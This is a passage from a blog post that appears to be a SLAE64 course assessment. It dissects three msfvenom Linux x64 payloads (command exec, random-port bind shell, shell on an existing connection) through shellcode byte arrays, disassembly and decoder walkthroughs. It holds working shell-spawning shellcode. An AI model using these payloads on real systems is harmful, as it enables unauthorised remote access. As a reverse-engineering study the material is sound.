Codehead's Corner
Random ramblings on hacking, coding, fighting with infrastructure and general tech
Security Tube SLAE64 Course - Assessment 5 - Metasploit Payload Analysis
Posted: 22 Nov 2017 at 11:10 by Codehead

After completing the video lectures of the Security Tube Linux 64 bit Assembler Expert course (SLAE64), a series of assessments must be completed to gain certification. This is the fifth assignment; analyse 3 payloads generated by the Metasploit msfvenom tool.

msfvenom is a replacement for the msfpayload and msfencode tools, combining their functionality into a single application. The payloads available specifically for x64 Linux are quite limited:

root@kali:~# msfvenom -l | grep linux/x64

linux/x64/exec                                      Execute an arbitrary command
linux/x64/meterpreter/bind_tcp                      Inject the mettle server payload (staged). Listen for a connection
linux/x64/meterpreter/reverse_tcp                   Inject the mettle server payload (staged). Connect back to the attacker
linux/x64/meterpreter_reverse_http                  Run the Meterpreter / Mettle server payload (stageless)
linux/x64/meterpreter_reverse_https                 Run the Meterpreter / Mettle server payload (stageless)
linux/x64/meterpreter_reverse_tcp                   Run the Meterpreter / Mettle server payload (stageless)
linux/x64/shell/bind_tcp                            Spawn a command shell (staged). Listen for a connection
linux/x64/shell/reverse_tcp                         Spawn a command shell (staged). Connect back to the attacker
linux/x64/shell_bind_tcp                            Listen for a connection and spawn a command shell
linux/x64/shell_bind_tcp_random_port                Listen for a connection in a random port and spawn a command shell. 
                                                    Use nmap to discover the open port: 'nmap -sS target -p-'.
linux/x64/shell_find_port                           Spawn a shell on an established connection
linux/x64/shell_reverse_tcp                         Connect back to attacker and spawn a command shell

To make things interesting, I let the system pick three payloads at random:

root@kali:~# msfvenom -l | grep linux/x64 | sort -R | head -n 3
linux/x64/shell_bind_tcp_random_port                Listen for a connection in a random port and spawn a command shell. 
                                                    Use nmap to discover the open port: 'nmap -sS target -p-'.
linux/x64/exec                                      Execute an arbitrary command
linux/x64/shell_find_port                           Spawn a shell on an established connection

A simple exec

Let’s look at exec first as it will probably be the simplest. This payload allows execution of an arbitrary command. We set the CMD parameter to specify the command we would like to execute. We’ll use a simple sh call for the demo and ask for the output in a ‘C’ style char array:

root@kali:~# msfvenom -p linux/x64/exec CMD=sh -f c
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 42 bytes
Final size of c file: 201 bytes
unsigned char buf[] = 
"\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00\x53"
"\x48\x89\xe7\x68\x2d\x63\x00\x00\x48\x89\xe6\x52\xe8\x03\x00"
"\x00\x00\x73\x68\x00\x56\x57\x48\x89\xe6\x0f\x05";

The 42 byte payload is nice and compact, but we can clearly see that there are some NULL bytes in there.
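To see exactly where the NULL bytes fall, the buffer can be scanned with a few lines of Python. This is only an illustrative sketch; the variable names are my own and the bytes are copied from the msfvenom output above.

```python
# Raw linux/x64/exec payload, copied from the msfvenom C array.
raw_exec = bytes.fromhex(
    "6a3b589948bb2f62696e2f73680053"
    "4889e7682d6300004889e652e80300"
    "000073680056574889e60f05"
)

# Offsets of every 0x00 byte in the payload.
null_offsets = [i for i, b in enumerate(raw_exec) if b == 0]

print(len(raw_exec), null_offsets)
```

The first hit is at offset 13, the terminator of the '/bin/sh' string.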

The tool allows us to specify ‘bad’ characters and will use encoding to remove them.

root@kali:~# msfvenom -p linux/x64/exec CMD=sh -b '\x00' -f c
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x64 from the payload
Found 2 compatible encoders
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=13, char=0x00)
Attempting to encode payload with 1 iterations of x64/xor
x64/xor succeeded with size 87 (iteration=0)
x64/xor chosen with final size 87
Payload size: 87 bytes
Final size of c file: 390 bytes
unsigned char buf[] = 
"\x48\x31\xc9\x48\x81\xe9\xfa\xff\xff\xff\x48\x8d\x05\xef\xff"
"\xff\xff\x48\xbb\xb8\xe5\xd4\xb4\x73\x27\x43\xcf\x48\x31\x58"
"\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xd2\xde\x8c\x2d\x3b\x9c"
"\x6c\xad\xd1\x8b\xfb\xc7\x1b\x27\x10\x87\x31\x02\xbc\x99\x10"
"\x27\x43\x87\x31\x03\x86\x5c\x70\x27\x43\xcf\xcb\x8d\xd4\xe2"
"\x24\x6f\xca\x29\xb7\xe0\xd4\xb4\x73\x27\x43\xcf";

Now the payload is clear of bad chars, but is up to 87 bytes. We can see from the messages that an XOR encoder has been used, so let’s see how it all works.

Decoding the payload

Using the shellcode wrapper we can compile the output and use objdump to extract the code section:

codehead@ubuntu:~$ objdump -D shellcode -M intel

...

0000000000601040 <code>:
  601040:   48 31 c9                xor    rcx,rcx
  601043:   48 81 e9 fa ff ff ff    sub    rcx,0xfffffffffffffffa
  60104a:   48 8d 05 ef ff ff ff    lea    rax,[rip+0xffffffffffffffef]
  601051:   48 bb b8 e5 d4 b4 73    movabs rbx,0xcf432773b4d4e5b8
  601058:   27 43 cf 
  60105b:   48 31 58 27             xor    QWORD PTR [rax+0x27],rbx
  60105f:   48 2d f8 ff ff ff       sub    rax,0xfffffffffffffff8
  601065:   e2 f4                   loop   60105b <code+0x1b>
  601067:   d2 de                   rcr    dh,cl
  601069:   8c 2d 3b 9c 6c ad       mov    WORD PTR [rip+0xffffffffad6c9c3b],gs
  60106f:   d1 8b fb c7 1b 27       ror    DWORD PTR [rbx+0x271bc7fb],1
  601075:   10 87 31 02 bc 99       adc    BYTE PTR [rdi-0x6643fdcf],al
  60107b:   10 27                   adc    BYTE PTR [rdi],ah
  60107d:   43 87 31                rex.XB xchg DWORD PTR [r9],esi
  601080:   03 86 5c 70 27 43       add    eax,DWORD PTR [rsi+0x4327705c]
  601086:   cf                      iret   
  601087:   cb                      retf   
  601088:   8d                      (bad)  
  601089:   d4                      (bad)  
  60108a:   e2 24                   loop   6010b0 <_end+0x8>
  60108c:   6f                      outs   dx,DWORD PTR ds:[rsi]
  60108d:   ca 29 b7                retf   0xb729
  601090:   e0 d4                   loopne 601066 <code+0x26>
  601092:   b4 73                   mov    ah,0x73
  601094:   27                      (bad)  
  601095:   43 cf                   rex.XB iret 

The result is a bit of a mess. However, we know that an XOR decoder is lurking in the header and the code would be mangled after a certain point. The instructions up to the loop at 601065 look reasonable so let’s see what they do.

The first two lines of code clear RCX and then subtract 0xfffffffffffffffa, which is -6 when read as a signed 64bit number. Subtracting -6 from zero leaves a value of 6 in the register. As RCX is generally used for loop control, we can assume that we should expect 6 iterations of an operation to occur soon.

xor    rcx,rcx
sub    rcx,0xfffffffffffffffa
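The wrap-around arithmetic is easy to check in Python by masking to 64 bits. This is a small sketch with names of my own choosing. Presumably the encoder uses the negative form because a literal 6 would put NULL bytes into the immediate, but that is my assumption rather than something the tool states.

```python
MASK64 = (1 << 64) - 1            # registers wrap at 64 bits

imm = 0xfffffffffffffffa          # immediate as printed by objdump
as_signed = imm - (1 << 64)       # the same bit pattern read as a signed value
rcx = (0 - imm) & MASK64          # xor rcx,rcx ; sub rcx,imm

print(as_signed, rcx)
```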

The next line uses a RIP relative offset to get the address of the start of the code block into RAX.

lea    rax,[rip+0xffffffffffffffef]
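RIP relative addressing works from the address of the following instruction, so the sum can be verified by hand. A quick sketch using the addresses from the objdump listing above (the variable names are mine):

```python
MASK64 = (1 << 64) - 1

lea_addr = 0x60104a               # address of the LEA in the listing
lea_len = 7                       # 48 8d 05 ef ff ff ff
disp = 0xffffffffffffffef         # displacement as printed, i.e. -0x11

next_rip = lea_addr + lea_len     # RIP points at the next instruction
rax = (next_rip + disp) & MASK64

print(hex(next_rip), hex(rax))
```

The result is 0x601040, the address of the code label.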

The next instruction loads an 8 byte sequence into RBX. This looks like the XOR key that will be used to decrypt the mangled code. Tests with msfvenom show that this key is randomly generated each time the tool runs.

movabs rbx,0xcf432773b4d4e5b8

The next three lines are the decode loop. The key value from RBX is XORed with contents of the address referenced by RAX plus an offset of 0x27. This reference resolves as the first line after the loop instruction. RAX then has a value of -8 subtracted from it, moving the RAX+0x27 reference to the next block to be decoded. Finally a loop statement causes the block to be executed RCX times.

_decode:
xor    QWORD PTR [rax+0x27],rbx
sub    rax,0xfffffffffffffff8
loop   _decode
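The same loop can be modelled in Python to confirm the reading of the decoder. This is a sketch rather than anything taken from Metasploit itself: the key, the 0x27 offset and the count of 6 come from the disassembly above, and the bytes are copied from the msfvenom output.

```python
import struct

KEY = 0xcf432773b4d4e5b8          # value loaded into RBX
STUB_LEN = 0x27                   # encoded body starts at [rax+0x27]
ROUNDS = 6                        # loop count set up in RCX

encoded = bytes.fromhex(
    "4831c94881e9faffffff488d05efff"
    "ffff48bbb8e5d4b4732743cf483158"
    "27482df8ffffffe2f4d2de8c2d3b9c"
    "6cadd18bfbc71b2710873102bc9910"
    "2743873103865c702743cfcb8dd4e2"
    "246fca29b7e0d4b4732743cf"
)

body = bytearray(encoded[STUB_LEN:])
for i in range(ROUNDS):
    # xor QWORD PTR [rax+0x27],rbx ; then advance by 8 bytes
    (qword,) = struct.unpack_from("<Q", body, i * 8)
    struct.pack_into("<Q", body, i * 8, qword ^ KEY)

decoded = bytes(body)
print(decoded.hex())
```

The first 42 bytes of the output match the unencoded payload generated earlier, followed by six zero bytes of padding.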

Once the loop has completed 6 iterations, the decoded shellcode is clear:

loop   _decode

<code+39> push   0x3b
<code+41> pop    rax
<code+42> cdq
<code+43> movabs rbx,0x68732f6e69622f 
<code+53> push   rbx
<code+54> mov    rdi,rsp
<code+57> push   0x632d
<code+62> mov    rsi,rsp
<code+65> push   rdx
<code+66> call   <code+74>
<code+71> jae    0x6010f1
<code+73> add    BYTE PTR [rsi+0x57],dl
<code+76> mov    rsi,rsp
<code+79> syscall

The decoder works in 8 byte blocks, so it actually overruns the end of the 42 byte shellcode by 6 bytes, resulting in a sequence of zeros which GDB interprets as add BYTE PTR [rax],al statements. Those instructions would only be reached if the execve call failed, so we don’t need to worry about them.

Examining the Payload

This payload is a simple execve call. We’ve seen this before in the first assignment, the parameters for the syscall are:

ID / RAX   Name         Arg1 / RDI             Arg2 / RSI                 Arg3 / RDX
59         sys_execve   const char *filename   const char *const argv[]   const char *const envp[]

The first two instructions set RAX to 0x3b (59 decimal) using PUSH and POP. This value is the ID value of sys_execve. The third line uses CDQ as a compact method of clearing RDX. The sign bit of EAX is extended across EDX and, as that bit is zero here, the register is neatly cleared with a one byte instruction.
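A tiny model of CDQ shows why the trick only works while the top bit of EAX is clear. This is just a sketch; the function name is my own. On x64, writing EDX also zeroes the upper half of RDX, which is why the whole register ends up cleared.

```python
def cdq(eax):
    """Return the EDX value that CDQ produces for a 32 bit EAX value."""
    return 0xFFFFFFFF if eax & 0x80000000 else 0

edx_small = cdq(0x3b)             # our case: sign bit clear
edx_negative = cdq(0x80000000)    # sign bit set

print(hex(edx_small), hex(edx_negative))
```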

The next few lines push the string ‘/bin/sh’ and the value 0x632d on to the stack and move the respective RSP values into RDI and RSI, storing the addresses of the two strings. Read as little-endian bytes, 0x632d is the string ‘-c’, the flag which tells the shell to run the command that follows it. Our actual command, ‘sh’, has not appeared yet.
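Packing the two immediates as little-endian bytes is a quick way to check what actually lands on the stack. A minimal sketch using Python's struct module (the variable names are mine):

```python
import struct

# movabs rbx,0x68732f6e69622f ; push rbx
path = struct.pack("<Q", 0x68732f6e69622f)

# push 0x632d (the immediate is extended to a full 8 byte stack slot)
flag = struct.pack("<Q", 0x632d)

print(path, flag)
```

The first value is the NULL terminated path ‘/bin/sh’ and the second is ‘-c’ followed by zero padding.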

The RDX register is pushed to zero terminate the arguments array which will be built in the next few instructions.

At this point the instructions start to become confusing. The CALL instruction doesn’t seem to land cleanly on the start of a line and the JAE and ADD instructions don’t make much sense in context.

Closer analysis of the raw hex at the location shows that GDB has been confused by an inline string:

(gdb) x/10bx 0x601087
0x601087 <code+71>:     0x73    0x68    0x00    0x56    0x57    0x48    0x89    0xe6
0x60108f <code+79>:     0x0f    0x05

The byte sequence 0x73,0x68,0x00 is a NULL terminated string containing ‘sh’. Disassembling the remaining bytes which align with the CALL <code+74> location, we see the actual instructions that will be executed:

(gdb) x/5i 0x60108a
   0x60108a <code+74>:  push   rsi
   0x60108b <code+75>:  push   rdi
   0x60108c <code+76>:  mov    rsi,rsp
   0x60108f <code+79>:  syscall 
   0x601091 <code+81>:  add    BYTE PTR [rax],al

The CALL simply skips over the string while placing its address on the stack. The next few lines push the stored memory references from RSI and RDI onto the stack, forming the rest of the argument array. Shifting RSP into RSI completes the set up of the arguments and the SYSCALL instruction will invoke our shell.

Analysing this code was useful in showing that GDB’s output isn’t always to be trusted. There were also some very nice size optimisation tricks that will help with future shellcode building.

Random TCP Port Bind Shell

The second example for dissection and analysis is a random port bind shell. It opens a listening port just like our example from assessment 1, but the port is chosen at random and must be found by scanning the target with nmap.

The basic output from msfvenom for this module is 57 bytes with no NULL characters, but I decided to try a different encoder on this payload to make things more interesting. There are only two encoders listed for x64: The XOR encoder and one I’d never heard of called zutto_dekiru.

Using zutto_dekiru generates a 115 byte payload:

root@kali:~# msfvenom -p linux/x64/shell_bind_tcp_random_port -f c -e x64/zutto_dekiru
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x64 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x64/zutto_dekiru
x64/zutto_dekiru succeeded with size 115 (iteration=0)
x64/zutto_dekiru chosen with final size 115
Payload size: 115 bytes
Final size of c file: 508 bytes
unsigned char buf[] = 
"\x48\xbd\x0f\x7b\x81\x33\x27\xae\x37\xf3\x54\xd9\xe9\x4d\x31"
"\xd2\x41\x5b\x66\x41\x81\xe3\xb0\xfa\x41\xb2\x08\x49\x0f\xae"
"\x03\x49\x83\xc3\x08\x4d\x8b\x3b\x49\xff\xca\x4b\x31\x6c\xd7"
"\x28\x4d\x85\xd2\x75\xf3\x47\x4a\x77\x7b\xd0\x48\xc8\x35\x65"
"\x79\xde\x83\x0e\xa1\x32\xa1\x51\x2b\xde\x83\x15\xa1\x32\x43"
"\x24\x74\x84\x64\x79\xe6\xa0\x0c\xc1\xcb\xa0\x3c\x22\xdb\xcf"
"\xa1\x47\xc4\xae\x1c\x45\xc7\x59\xdc\x7c\x13\xd6\x67\x78\x1e"
"\x0c\xfc\x0a\x66\x35\xa4\xf2\x7a\x80\xba";

Testing the payload in the shellcode wrapper shows that everything works as expected. Once the payload is running, nmap quickly finds the port and we can connect as before.

MBP:slae64$ gcc -z execstack -fno-stack-protector shellcode_wrapper.c -o shellcode
MBP:slae64$ ./shellcode &
[1] 22768
Shellcode Length:  115

MBP:slae64$ sudo nmap -sS 127.0.0.1 -p-

Starting Nmap 5.21 ( http://nmap.org ) at 2017-11-20 10:29 GMT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.0000010s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE
53/tcp    open  domain
631/tcp   open  ipp
36328/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds

MBP:slae64$ cd ~/
MBP:~$ nc 127.0.0.1 36328
pwd
/home/codehead/SLAE64
exit
[1]+  Done                    ./shellcode  (wd: ~/SLAE64)
(wd now: ~)
MBP:~$

Unpicking Zutto Dekiru

A quick dump of the GDB disassembly looks pretty confusing:

<code>      movabs rbp,0xf337ae2733817b0f             
<code+10>   push   rsp                                
<code+11>   fldl2t                                    
<code+13>   xor    r10,r10                            
<code+16>   pop    r11                                
<code+18>   and    r11w,0xfab0                        
<code+24>   mov    r10b,0x8                           
<code+27>   fxsave64 [r11]                            
<code+31>   add    r11,0x8                            
<code+35>   mov    r15,QWORD PTR [r11]                
<code+38>   dec    r10                                
<code+41>   xor    QWORD PTR [r15+r10*8+0x28],rbp     
<code+46>   test   r10,r10                            
<code+49>   jne    <code+38>                
<code+51>   rex.RXB                                   
<code+52>   rex.WX ja                        
<code+55>   ror    BYTE PTR [rax-0x38],1              
<code+58>   xor    eax,0x83de7965                     
<code+63>   (bad)                                     
<code+64>   movabs eax,ds:0xa11583de2b51a132          
<code+73>   xor    al,BYTE PTR [rbx+0x24]             
<code+76>   je                               
<code+78>   fs                                        
<code+79>   jns    <code+55>                
<code+81>   movabs al,ds:0xcfdb223ca0cbc10c           
<code+90>   movabs eax,ds:0xdc59c7451caec447          
<code+99>   jl     <completed.6531>          
<code+101>  (bad)                                     
<code+102>  addr32 js <dtor_idx.6533+7>      
<code+105>  or     al,0xfc                            
<code+107>  or     ah,BYTE PTR [rsi+0x35]             
<code+110>  movs   BYTE PTR es:[rdi],BYTE PTR ds:[rsi]
<code+111>  repnz jp <__dso_handle+10>       
<code+114>  mov    edx,0x0  

We can assume that the code later in the module is encoded, but even the top section looks pretty strange. At first glance we can guess that the work is done between <code+38> and the JNE loop at <code+49> with quite a bit of setup beforehand.

After analysing the code in GDB, the function of the header becomes clear. The FLDL2T instruction loads the ST0 floating point register with the constant log2(10). The actual value is irrelevant; what the code is really doing is finding its own location in memory. Floating point operations have their own control registers and all of the extended registers can be saved to a memory location using the FXSAVE64 instruction.

The floating point registers can be viewed in GDB as part of the extended register dump:

(gdb) info all-registers
...
fctrl       0x37f    895
fstat       0x3800   14336
ftag        0x3fff   16383
fiseg       0x0      0
fioff       0x60104b 6295627
foseg       0x0      0
fooff       0x0      0
fop         0x0      0
...

So the inclusion of the FLDL2T instruction is purely to ensure that the floating point registers are used and the FPU IP register (FIOFF) will contain the address of the opcode.

We see a few instructions which store the stack pointer and apply an offset. This is to make room on the stack for the data generated by the FXSAVE64 operation, which uses 512 bytes to store all of the extended registers. Interestingly, the AND operation at <code+18> only seems to generate 264 bytes of space and the FXSAVE64 operation overwrites the current stack. However, this does not cause any problems during execution.

After storing the extended register values, the ADD and MOV operations at <code+31> and <code+35> retrieve the address of the FLDL2T instruction from the FPU IP field and store it in R15. Now that we have an absolute reference to our code in memory, R10 is used as a counter and offset to apply an XOR key to the encoded payload.

The 8 byte XOR key is loaded into RBP at the start of the code. The complex XOR statement at <code+41> uses an offset of 0x28 added to the absolute value from R15 to locate the start of the encoded payload (<code+51>). An additional step offset is created by multiplying the counter value in R10 by 8. As the value in R10 is decremented with each pass, the calculated offset reduces by 8 bytes each time, meaning the code is decoded from the bottom upwards. When R10 reaches zero, the JNE test at <code+49> fails and execution passes to the freshly decoded payload.
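To check this reading of the decoder, the loop can be reproduced in Python. This is a sketch of my own, not code from the encoder: the key, the 0x28 offset and the block count are taken from the disassembly, offsets are relative to the start of the buffer rather than absolute addresses, and the bytes are copied from the msfvenom output.

```python
import struct

KEY = 0xf337ae2733817b0f              # movabs rbp,imm64
FLDL2T_OFFSET = 11                    # <code+11>, recorded by FXSAVE64
BODY_OFFSET = FLDL2T_OFFSET + 0x28    # 51, i.e. <code+51>
BLOCKS = 8                            # mov r10b,0x8

encoded = bytes.fromhex(
    "48bd0f7b813327ae37f354d9e94d31"
    "d2415b664181e3b0fa41b208490fae"
    "034983c3084d8b3b49ffca4b316cd7"
    "284d85d275f3474a777bd048c83565"
    "79de830ea132a1512bde8315a13243"
    "2474846479e6a00cc1cba03c22dbcf"
    "a147c4ae1c45c759dc7c13d667781e"
    "0cfc0a6635a4f27a80ba"
)

buf = bytearray(encoded)
r10 = BLOCKS
while r10:
    r10 -= 1                                      # dec r10
    pos = BODY_OFFSET + r10 * 8                   # [r15+r10*8+0x28]
    (qword,) = struct.unpack_from("<Q", buf, pos)
    struct.pack_into("<Q", buf, pos, qword ^ KEY)  # xor with rbp

decoded = bytes(buf[BODY_OFFSET:])
print(decoded.hex())
```

The output begins 48 31 f6, which is xor rsi,rsi, so the decoded block starts with a sensible instruction. The last block is processed first, matching the bottom-up order described above.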

Analysing the Payload

The decoded payload looks like this:

<code+51>      xor    rsi,rsi
<code+54>      mul    rsi
<code+57>      inc    esi
<code+59>      push   0x2
<code+61>      pop    rdi
<code+62>      mov    al,0x29                
<code+64>      syscall                       
<code+66>      push   rdx                    
<code+67>      pop    rsi                    
<code+68>      push   rax                    
<code+69>      pop    rdi                    
<code+70>      mov    al,0x32                
<code+72>      syscall                       
<code+74>      mov    al,0x2b                
<code+76>      syscall                       
<code+78>      push   rdi                    
<code+79>      pop    rsi                    
<code+80>      xchg   rdi,rax                
<code+82>      dec    esi                    
<code+84>      mov    al,0x21                
<code+86>      syscall                       
<code+88>      jne    <code+82>     
<code+90>      push   rdx                    
<code+91>      movabs rdi,0x68732f6e69622f2f 
<code+101>     push   rdi                    
<code+102>     push   rsp                    
<code+103>     pop    rdi                    
<code+104>     mov    al,0x3b                
<code+106>     syscall                       
<code+108>     sbb    eax,0xd4d597b4         
<code+113>     mov    bh,0x49                
<code+115>     add    BYTE PTR [rax],al 

As we’ve already built a bind shell in assessment 1, the general structure of the code is pretty familiar. The first 7 lines are concerned with using syscall 0x29, SYS_SOCKET to create a TCP INET socket. Clearing RSI with XOR then using MUL on the empty register clears out RAX and RDX in an efficient manner. Setting the usual arguments of AF_INET (2) and SOCK_STREAM (1) creates a standard socket when the syscall is executed.

At this point we would normally bind the socket to a port before listening for connections. The description of the payload described a randomly allocated port and I was looking forward to seeing some interesting random number generation code. However, the next section invokes syscall 0x32, SYS_LISTEN.

<code+66>      push   rdx                    
<code+67>      pop    rsi                    
<code+68>      push   rax                    
<code+69>      pop    rdi                    
<code+70>      mov    al,0x32                
<code+72>      syscall  

We know that the code works, so there must be something else happening here. After reviewing the BSD Sockets documentation, I discovered the following useful nugget:


It is not necessary to bind a socket prior to connecting it. If a socket is not bound the library will choose the local port and IP.


This is handy as it also removes the overhead of building a SOCKADDR_IN structure. The SYS_LISTEN call itself is unremarkable, a few values such as the socket ID are switched from other registers to build the arguments.
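The behaviour is easy to reproduce outside of shellcode. The sketch below uses Python's socket module and assumes a Linux host; it calls listen() without a preceding bind() and asks the kernel which port was picked. It is an illustration of the behaviour, not a translation of the payload.

```python
import socket

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.listen(0)                       # no bind() call beforehand

# The kernel has already assigned a local address and port.
host, port = sock.getsockname()
print(host, port)

sock.close()
```

Running it a few times should print a different high port on each run.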

The SYS_ACCEPT call, which blocks until a connection is received, is surprisingly brief.

<code+74>      mov    al,0x2b                
<code+76>      syscall     

The ID value of 0x2b is placed in RAX and then the syscall is invoked with no other arguments in place. Dynamic analysis with GDB shows that RSI and RDX arguments are zero, so the pointers are NULL and the SOCKADDR_IN and size data is discarded. This is an unexpected shortcut, but the returned information is not used so it makes sense to optimise it away if the system allows.

Once the incoming connection has been accepted, another surprising optimisation is found for the SYS_DUP2 section dealing with directing I/O descriptors through the new socket.

<code+78>      push   rdi                    
<code+79>      pop    rsi                    
<code+80>      xchg   rdi,rax                
<code+82>      dec    esi                    
<code+84>      mov    al,0x21                
<code+86>      syscall                       
<code+88>      jne    <code+82>     

Normally we would duplicate descriptors 0, 1 and 2 (STDIN, STDOUT and STDERR) explicitly. However, the code reuses the original socket ID value returned from SYS_SOCKET as the starting descriptor ID and enters a tight loop which repeatedly decrements the descriptor value and calls SYS_DUP2. Observations of socket ID values show that they start at 7 or 8 at least on a quiet system, so SYS_DUP2 ends up making a few unnecessary calls which duplicate the connection onto descriptors we have no use for. The JNE which closes the loop tests the zero flag set by DEC ESI, as the flags are restored when the syscall returns, so the loop ends once descriptor zero has been duplicated. So a trade off between shellcode size and a few wasted calls achieves the desired I/O redirection result with minimal juggling of parameters.
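The loop can be modelled without touching any real descriptors. The function below is a hypothetical helper of my own which simply lists the descriptor numbers that would be passed to SYS_DUP2 for a given listening socket ID. It assumes the socket ID is at least 1.

```python
def dup2_targets(listen_fd):
    """List the newfd values the loop passes to dup2, in order."""
    targets = []
    esi = listen_fd                # push rdi ; pop rsi
    while True:
        esi -= 1                   # dec esi
        targets.append(esi)        # dup2(client_fd, esi)
        if esi == 0:               # jne falls through at zero
            break
    return targets

print(dup2_targets(8))
```

With a socket ID of 8 the loop makes eight calls, of which only the last three (2, 1 and 0) matter.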

The last section of code is a SYS_EXECVE call.

<code+90>      push   rdx                    
<code+91>      movabs rdi,0x68732f6e69622f2f 
<code+101>     push   rdi                    
<code+102>     push   rsp                    
<code+103>     pop    rdi                    
<code+104>     mov    al,0x3b                
<code+106>     syscall                 

We have done enough of these over the last few assessments to know how this works. The string ‘//bin/sh’ is used for the command, the doubled slash padding the path out to exactly 8 bytes. Unusually, RSI is still zero from the SYS_DUP2 loop so the arguments array pointer is NULL, but the call still has the desired effect.

The remaining instructions from <code+108> are artefacts of the decoding process and are ignored.

This code was surprising in its simplicity and showed that many shortcuts are possible when using syscalls, resulting in very compact shellcode.

Spawning a Shell on an Existing Connection

The third and last sample payload also spawns a shell, but this time the description states that an existing connection will be used. As both of the x64 encoders have been examined and the default generated shellcode for this payload contains no NULL values, this sample will be analysed with no encoding.

Payload options include specifying the local port so the following sample was generated:

root@kali:~# msfvenom -p linux/x64/shell_find_port -f c CPORT=5555
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 91 bytes
Final size of c file: 409 bytes
unsigned char buf[] = 
"\x48\x31\xff\x48\x31\xdb\xb3\x14\x48\x29\xdc\x48\x8d\x14\x24"
"\x48\x8d\x74\x24\x04\x6a\x34\x58\x0f\x05\x48\xff\xc7\x66\x81"
"\x7e\x02\x15\xb3\x75\xf0\x48\xff\xcf\x6a\x02\x5e\x6a\x21\x58"
"\x0f\x05\x48\xff\xce\x79\xf6\x48\x89\xf3\xbb\x41\x2f\x73\x68"
"\xb8\x2f\x62\x69\x6e\x48\xc1\xeb\x08\x48\xc1\xe3\x20\x48\x09"
"\xd8\x50\x48\x89\xe7\x48\x31\xf6\x48\x89\xf2\x6a\x3b\x58\x0f"
"\x05";

When running the payload under the shellcode wrapper I was unable to get the shell to spawn due to constant EBADF (Bad file descriptor) errors even when reading the active socket. As a result the analysis has to be done statically.

The disassembled shellcode looks like this:

<code>         xor    rdi,rdi               
<code+3>       xor    rbx,rbx                   
<code+6>       mov    bl,0x14                   
<code+8>       sub    rsp,rbx                     
<code+11>      lea    rdx,[rsp]               
<code+15>      lea    rsi,[rsp+0x4]     
<code+20>      push   0x34                      
<code+22>      pop    rax                       
<code+23>      syscall                            
<code+25>      inc    rdi                       
<code+28>      cmp    WORD PTR [rsi+0x2],0xb315 
<code+34>      jne    <code+20>   
<code+36>      dec    rdi                       
<code+39>      push   0x2                       
<code+41>      pop    rsi                       
<code+42>      push   0x21                      
<code+44>      pop    rax                       
<code+45>      syscall                   
<code+47>      dec    rsi                       
<code+50>      jns    <code+42>  
<code+52>      mov    rbx,rsi                   
<code+55>      mov    ebx,0x68732f41            
<code+60>      mov    eax,0x6e69622f            
<code+65>      shr    rbx,0x8                   
<code+69>      shl    rbx,0x20                  
<code+73>      or     rax,rbx                   
<code+76>      push   rax                       
<code+77>      mov    rdi,rsp                   
<code+80>      xor    rsi,rsi                   
<code+83>      mov    rdx,rsi                   
<code+86>      push   0x3b                      
<code+88>      pop    rax                       
<code+89>      syscall 

We can see three sections, corresponding to three syscalls.

The first section uses SYS_GETPEERNAME to retrieve information about socket state. The function template is:

ID / RAX   Name              Arg1 / RDI   Arg2 / RSI                  Arg3 / RDX
52         sys_getpeername   int fd       struct sockaddr *sockaddr   int *sockaddr_len

The RDI register (socket ID) is cleared and 20 bytes of stack space are reserved for the sockaddr structure and its accompanying size value. The code then loops, executing the syscall, incrementing the socket ID and checking the sockaddr structure for our target port value (5555). The loop has no upper bound and simply carries on until a match is found, but descriptors are handed out from the lowest free number upwards, so a live connection should turn up within a few iterations.
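The comparison value of 0xb315 looks odd next to a port of 5555 (0x15b3) until byte order is taken into account. The port field sits at offset 2 of the sockaddr_in structure in network (big-endian) order, while CMP reads the word as little-endian. A short sketch with Python's struct module, using names of my own:

```python
import struct

port = 5555
wire = struct.pack("!H", port)               # bytes as stored in sin_port
as_le_word = struct.unpack("<H", wire)[0]    # the same bytes read by CMP

print(wire.hex(), hex(as_le_word))
```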

Once a socket connected to the target port is found, the code moves on to duplicating the I/O descriptors into the target socket.

<code+36>      dec    rdi
<code+39>      push   0x2                       
<code+41>      pop    rsi                       
<code+42>      push   0x21                      
<code+44>      pop    rax                       
<code+45>      syscall                   
<code+47>      dec    rsi                       
<code+50>      jns    <code+42> 

This section is similar to the cut down loop seen in the previous payload. The socket ID is already in RDI although a decrement is required to counteract the action of the scanning loop. The descriptor ID in RSI is manually set to 2 and the same loop/decrement process is used to duplicate STDERR, STDOUT and STDIN. JNS is used to end the loop when RSI becomes a negative number.

The final section is an execve call to spawn a shell.

<code+47>      dec    rsi                       
<code+50>      jns    <code+42>  
<code+52>      mov    rbx,rsi                   
<code+55>      mov    ebx,0x68732f41            
<code+60>      mov    eax,0x6e69622f            
<code+65>      shr    rbx,0x8                   
<code+69>      shl    rbx,0x20                  
<code+73>      or     rax,rbx                   
<code+76>      push   rax                       
<code+77>      mov    rdi,rsp                   
<code+80>      xor    rsi,rsi                   
<code+83>      mov    rdx,rsi                   
<code+86>      push   0x3b                      
<code+88>      pop    rax                       
<code+89>      syscall 

The ‘/bin/sh’ string is built from two 32 bit values. An ‘A’ character pads the ‘/sh’ half out to four bytes, which keeps a NULL byte out of the immediate value. Some bit shifting then removes this extra character and moves the half into the upper 32 bits of the register, where it is combined with ‘/bin’ by an OR operation. The final string is pushed onto the stack and the other parameters are set to 0.
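The shifts are easier to follow with the values written out. This sketch repeats the register operations in Python, masking to 64 bits; the variable names simply mirror the registers.

```python
import struct

MASK64 = (1 << 64) - 1

rbx = 0x68732f41                  # mov ebx,0x68732f41  ('A/sh', upper half zeroed)
rax = 0x6e69622f                  # mov eax,0x6e69622f  ('/bin')

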